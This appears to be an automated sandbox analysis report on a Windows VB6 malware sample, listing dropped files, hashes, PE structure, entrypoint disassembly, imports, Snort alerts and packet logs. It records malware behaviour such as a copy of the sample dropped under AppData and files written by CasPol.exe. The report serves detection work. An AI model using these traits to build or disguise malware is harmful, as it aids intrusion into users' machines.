                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):1.3424693381122756
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:rMereSiNgxcqYmOCA3OgUTZzR+MYVAJf3L:onTFCSBUTZzgMYVA
                                                                                    MD5:8BE47FF78C4F694E6577D8CB72B022C9
                                                                                    SHA1:A32191D769A55B59B38A93EBEA848166EA27F0D6
                                                                                    SHA-256:A1005C0FAF60AA8C70AD16C4369E6D3FA2357687BC10EE55656363B01DDD633E
                                                                                    SHA-512:D19109A2AB8141E8A7AF066204652CEE0938A10B45E46B929C825B4844323FB6D184F1BA90D8007ADEAC0CE31F84F25B482153DEA1BEA881E7B5ABE43545A2A3
                                                                                    Malicious:false
                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\~DF8D75D8181C79D5C9.TMP
                                                                                    Process:C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):1.3424693381122756
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:rMereSiNgxcqYmOCA3OgUTZzR+MYVAJf3L:onTFCSBUTZzgMYVA
                                                                                    MD5:8BE47FF78C4F694E6577D8CB72B022C9
                                                                                    SHA1:A32191D769A55B59B38A93EBEA848166EA27F0D6
                                                                                    SHA-256:A1005C0FAF60AA8C70AD16C4369E6D3FA2357687BC10EE55656363B01DDD633E
                                                                                    SHA-512:D19109A2AB8141E8A7AF066204652CEE0938A10B45E46B929C825B4844323FB6D184F1BA90D8007ADEAC0CE31F84F25B482153DEA1BEA881E7B5ABE43545A2A3
                                                                                    Malicious:false
                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):8
                                                                                    Entropy (8bit):3.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Y8:L
                                                                                    MD5:68FA889EAA7BD7261D43798E3A69D469
                                                                                    SHA1:7BB929B4F0BDBF04279044430673D375E5AA227A
                                                                                    SHA-256:C19803F4888437D8C3F525DF3503D92186C0038C99E1CA2FFF06AB95C86396B1
                                                                                    SHA-512:CD3AC3342CBAB172D17BAE72E6D864BFB9FE0EDF826923445B1485BD7EB825DEA4C023E134B72E9D7CBD1B4D179F36E094DF5F39B27864E140C514AB9FC1280E
                                                                                    Malicious:true
                                                                                    Preview: ...!...H
                                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\task.dat
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):56
                                                                                    Entropy (8bit):4.745141646068962
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:oMty8WbSmm:oMLWumm
                                                                                    MD5:F781103B538E4159A8F01E3BE09B1F8D
                                                                                    SHA1:27992585DE22A095BABCFD75E8F96710DD921C37
                                                                                    SHA-256:BEA91983791C26C19AA411B2870E89AFC250EAF9855B6E1CE7BEA02B74E7F368
                                                                                    SHA-512:D50AE0A01E74FC263B704FADE17CDF4993B61E34FD498827D546F090CE2DA5E8F24D4D34FBF360AE7EE5C5E7E3F032F3DDA8AD0C2A2CF0E1DAFEED61258AB4CA
                                                                                    Malicious:false
                                                                                    Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                                                                    C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):81920
                                                                                    Entropy (8bit):6.527320740089958
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:tGs2yzOSOXbgSXZXMyETdwDgL/UQdz+mehpITwHM/kho:tGOzvOXbgSXZXA2Dk/UQHehiTMM8o
                                                                                    MD5:E70022C5636DB76B71C8B2C56552C60C
                                                                                    SHA1:4589B37F02BB95D26BB2BA369C46C99268CE2985
                                                                                    SHA-256:0226B26F82EA7AB25AD85A4CFDA530F7B28F91B1D57F8CA0361B7B03E8CE59BB
                                                                                    SHA-512:D9D16DED54F7424145ABA6F423B82AB4C010CC1EE67ACB152A1D79B61F23FEDC9250DD482B78E3C84AC4B82CDC9283099A06EE5A2D5D14D34E78734F60DD7F61
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L....e.L.....................0............... ....@..........................P..................................................(....@......................................................................0... .......@............................text............................... ..`.data...(.... ....... ..............@....rsrc........@.......0..............@..@l.[J............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    \Device\ConDrv
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):182
                                                                                    Entropy (8bit):5.07060597644582
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:RGXKRjN3Mxm8d/AjhclROXDD9jmKXVM8/FOoDamd9xraWMZ4MKLJFcLEWgJya7:zx3M7ucLOdBXVNYmd9NaWM6MKnH5JyY
                                                                                    MD5:B08826036A3E81B44E7D8C1284381013
                                                                                    SHA1:96CF7E6BC1B55C69CE33BEC3B78FFF4EB8839B87
                                                                                    SHA-256:E7AD5092F56BB2ACA26262C361FE5F83171D21AB134D4E5D2EF47E9BF641B549
                                                                                    SHA-512:EB9908F6FB6398EDCE4F3B18AA64ABEE8774D1CA3A5B533617C97AAC5E795627CCB8B1176BE64371E6BEF6352004FC2B4862A388D61A6103D05B5B2D02CD0481
                                                                                    Malicious:false
                                                                                    Preview: Microsoft (R) .NET Framework CasPol 2.0.50727.9149..Copyright (c) Microsoft Corporation. All rights reserved.....ERROR: Invalid option: 0....For usage information, use 'caspol -?'..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):6.527320740089958
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Doc0011222003.exe
                                                                                    File size:81920
                                                                                    MD5:e70022c5636db76b71c8b2c56552c60c
                                                                                    SHA1:4589b37f02bb95d26bb2ba369c46c99268ce2985
                                                                                    SHA256:0226b26f82ea7ab25ad85a4cfda530f7b28f91b1d57f8ca0361b7b03e8ce59bb
                                                                                    SHA512:d9d16ded54f7424145aba6f423b82ab4c010cc1ee67acb152a1d79b61f23fedc9250dd482b78e3c84ac4b82cdc9283099a06ee5a2d5d14d34e78734f60dd7f61
                                                                                    SSDEEP:1536:tGs2yzOSOXbgSXZXMyETdwDgL/UQdz+mehpITwHM/kho:tGOzvOXbgSXZXA2Dk/UQHehiTMM8o
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L....e.L.....................0............... ....@........

                                                                                    File Icon

                                                                                    Icon Hash:78ecccecccceec70

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4013cc
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x4CDA65A9 [Wed Nov 10 09:28:09 2010 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:37fe5edb896809a8dcea667d1a5d3341

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push 004021D4h
                                                                                    call 00007FDFB8464653h
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    xor byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    dec eax
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add al, bl
                                                                                    jc 00007FDFB84646A9h
                                                                                    dec esp
                                                                                    in eax, 35h
                                                                                    inc edx
                                                                                    inc edi
                                                                                    cmpsd
                                                                                    xchg byte ptr [ecx-66h], ch
                                                                                    adc eax, 00D1123Eh
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [ecx], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [ebx+20h], dh
                                                                                    dec ecx
                                                                                    outsb
                                                                                    je 00007FDFB84646C7h
                                                                                    dec esi
                                                                                    outsd
                                                                                    outsb
                                                                                    popad
                                                                                    jne 00007FDFB84646D6h
                                                                                    push 7469726Fh
                                                                                    popad
                                                                                    je 00007FDFB84646CBh
                                                                                    jbe 00007FDFB84646C7h
                                                                                    add byte ptr [eax], ah
                                                                                    inc ecx
                                                                                    jnc 00007FDFB8464682h
                                                                                    dec ecx
                                                                                    outsb
                                                                                    je 00007FDFB8464662h
                                                                                    add byte ptr [eax], al
                                                                                    add bh, bh
                                                                                    int3
                                                                                    xor dword ptr [eax], eax
                                                                                    or dword ptr [eax], esp
                                                                                    arpl word ptr [ebp+43h], ax
                                                                                    dec edi
                                                                                    cmc
                                                                                    cdq
                                                                                    dec edi
                                                                                    xchg eax, ecx
                                                                                    jo 00007FDFB84646CEh
                                                                                    add eax, BD8CFE91h
                                                                                    out dx, al
                                                                                    pop ecx
                                                                                    dec ebp
                                                                                    salc
                                                                                    jmp 00007FDF772400A6h
                                                                                    cmc
                                                                                    xchg eax, esp
                                                                                    inc ebx
                                                                                    movsd
                                                                                    fstcw word ptr [edx]
                                                                                    dec edi
                                                                                    lodsd
                                                                                    xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                    or al, 00h
                                                                                    stosb
                                                                                    add byte ptr [eax-2Dh], ah
                                                                                    xchg eax, ebx
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    int3
                                                                                    or eax, dword ptr [eax]
                                                                                    add byte ptr [esi+0Ah], cl
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [ecx], cl
                                                                                    add byte ptr [ecx+ebp*2+76h], al
                                                                                    imul esp, dword ptr [ecx+62h], 0D00656Ch

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x116840x28.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000xe08.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x140.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x10bb40x11000False0.628547219669data7.08459440381IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .data0x120000x14280x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x140000xe080x1000False0.452880859375data4.20020036066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x1483e0x568GLS_BINARY_LSB_FIRST
                                                                                    RT_ICON0x143d60x468GLS_BINARY_LSB_FIRST
                                                                                    RT_STRING0x14da60x62dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x143b40x22data
                                                                                    RT_VERSION0x141600x254dataEnglishUnited States

                                                                                    Imports

                                                                                    DLLImport
                                                                                    MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarAdd, __vbaInStrB, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0409 0x04b0
                                                                                    InternalNameChalybes
                                                                                    FileVersion6.00
                                                                                    CompanyNameSillyCame
                                                                                    ProductNameSillyCame
                                                                                    ProductVersion6.00
                                                                                    FileDescriptionSillyCame
                                                                                    OriginalFilenameChalybes.exe

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    11/23/21-14:40:03.810298UDP254DNS SPOOF query response with TTL of 1 min. and no authority53548468.8.8.8192.168.11.20
                                                                                    11/23/21-14:40:10.252781UDP254DNS SPOOF query response with TTL of 1 min. and no authority53639428.8.8.8192.168.11.20
                                                                                    11/23/21-14:40:16.622270UDP254DNS SPOOF query response with TTL of 1 min. and no authority53565558.8.8.8192.168.11.20
                                                                                    11/23/21-14:41:15.238456UDP254DNS SPOOF query response with TTL of 1 min. and no authority53624378.8.8.8192.168.11.20
                                                                                    11/23/21-14:41:21.576734UDP254DNS SPOOF query response with TTL of 1 min. and no authority53603298.8.8.8192.168.11.20
                                                                                    11/23/21-14:41:27.938915UDP254DNS SPOOF query response with TTL of 1 min. and no authority53496078.8.8.8192.168.11.20
                                                                                    11/23/21-14:42:30.697716UDP254DNS SPOOF query response with TTL of 1 min. and no authority53545198.8.8.8192.168.11.20
                                                                                    11/23/21-14:42:37.016489UDP254DNS SPOOF query response with TTL of 1 min. and no authority53557668.8.8.8192.168.11.20
                                                                                    11/23/21-14:43:32.998545UDP254DNS SPOOF query response with TTL of 1 min. and no authority53631208.8.8.8192.168.11.20
                                                                                    11/23/21-14:43:39.315954UDP254DNS SPOOF query response with TTL of 1 min. and no authority53600378.8.8.8192.168.11.20
                                                                                    11/23/21-14:44:41.553090UDP254DNS SPOOF query response with TTL of 1 min. and no authority53502238.8.8.8192.168.11.20
                                                                                    11/23/21-14:44:47.862178UDP254DNS SPOOF query response with TTL of 1 min. and no authority53644968.8.8.8192.168.11.20
                                                                                    11/23/21-14:44:54.175638UDP254DNS SPOOF query response with TTL of 1 min. and no authority53556338.8.8.8192.168.11.20
                                                                                    11/23/21-14:45:50.131794UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521718.8.8.8192.168.11.20
                                                                                    11/23/21-14:45:56.457565UDP254DNS SPOOF query response with TTL of 1 min. and no authority53538438.8.8.8192.168.11.20

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2021 14:40:00.919310093 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:00.919333935 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:00.919462919 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:00.930958033 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:00.930972099 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:00.967425108 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:00.967616081 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:00.968291998 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:00.968468904 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.059115887 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.059417963 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.059659004 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.062866926 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.103856087 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.524535894 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.525124073 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.525152922 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.525460958 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.530965090 CET49820443192.168.11.20142.250.184.206
                                                                                    Nov 23, 2021 14:40:01.531017065 CET44349820142.250.184.206192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.626995087 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.627011061 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.627208948 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.627507925 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.627516031 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.681910038 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.682104111 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.684865952 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.685111046 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.688549995 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.688596010 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.689070940 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.689260960 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.689578056 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.731983900 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.991430998 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.991580963 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.991616964 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.991632938 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.991997957 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.992263079 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.992710114 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.992934942 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.994107008 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.994340897 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.994437933 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.994493961 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.994646072 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.994877100 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.995085955 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:01.995132923 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.995330095 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.002157927 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.002374887 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.002403021 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.002448082 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.002572060 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.002608061 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.002634048 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.002834082 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.003185034 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.003503084 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.003552914 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.003801107 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.003976107 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.004281998 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.004323006 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.004542112 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.004700899 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.004889965 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.004914999 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.005101919 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.005294085 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.005492926 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.005542040 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.005745888 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.006139994 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.006335974 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.006383896 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.006535053 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.006907940 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.007193089 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.007249117 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.007416964 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.007623911 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.007807016 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.007853031 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.008080006 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.008198977 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.008397102 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.008444071 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.008749008 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.009023905 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.009172916 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.009196043 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.009474039 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.009639025 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.009824991 CET44349821142.250.181.225192.168.11.20
                                                                                    Nov 23, 2021 14:40:02.009881973 CET49821443192.168.11.20142.250.181.225
                                                                                    Nov 23, 2021 14:40:02.009932995 CET44349821142.250.181.225192.168.11.20

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2021 14:40:00.900080919 CET6441653192.168.11.201.1.1.1
                                                                                    Nov 23, 2021 14:40:00.909338951 CET53644161.1.1.1192.168.11.20
                                                                                    Nov 23, 2021 14:40:01.589149952 CET6041453192.168.11.201.1.1.1
                                                                                    Nov 23, 2021 14:40:01.625597954 CET53604141.1.1.1192.168.11.20
                                                                                    Nov 23, 2021 14:40:03.796792030 CET5484653192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:40:03.810297966 CET53548468.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:40:10.239578962 CET6394253192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:40:10.252780914 CET53639428.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:40:16.609045029 CET5655553192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:40:16.622270107 CET53565558.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:41:15.225421906 CET6243753192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:41:15.238456011 CET53624378.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:41:21.563921928 CET6032953192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:41:21.576734066 CET53603298.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:41:27.925158024 CET4960753192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:41:27.938915014 CET53496078.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:42:24.367233038 CET5093453192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:42:24.379199982 CET53509348.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:42:30.678195953 CET5451953192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:42:30.697715998 CET53545198.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:42:37.005242109 CET5576653192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:42:37.016489029 CET53557668.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:42:42.611356974 CET6279153192.168.11.201.1.1.1
